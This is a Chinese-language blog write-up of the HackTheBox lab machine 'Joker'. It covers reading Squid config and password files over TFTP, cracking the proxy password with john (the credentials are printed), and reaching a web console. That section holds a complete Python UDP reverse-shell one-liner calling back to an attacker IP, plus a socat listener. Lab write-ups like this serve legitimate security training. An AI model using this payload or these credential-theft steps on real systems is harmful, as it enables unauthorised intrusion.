oscp——htb——Joker

0x00 前言

这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。

在这里插入图片描述

0x01 信息收集

在这里插入图片描述

0x02 Web——Webshell

这里有一个3128开放,我找了历史漏洞但是都没有利用成功。

最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。

在这里插入图片描述
但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。

使用tftp进行连接
然后获取squid相关内容
/etc/squid/squid.conf
/etc/squid/passwords
获取一下相关内容

在这里插入图片描述
cat一下
在这里插入图片描述
john进行爆破获取到密码:kalamari/ihateseafood
在这里插入图片描述
这里输入正确的密码之后就可以看到一个界面
在这里插入图片描述
这里找到一个console页面、

在这里插入图片描述
使用tcp没有办法反弹会shell,最后采用udp反弹shell

import subprocess;subprocess.Popen(["python", "-c", 'import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"10.10.14.3\", 4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn(\"/bin/sh\");s.close()'])

在这里插入图片描述

socat file:`tty`,echo=0,raw udp-listen:1234  

在这里插入图片描述
获取一下pty
在这里插入图片描述
我拿到的shell没法执行sudoedit,有点难受。后面的就有点不会了。。。。

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页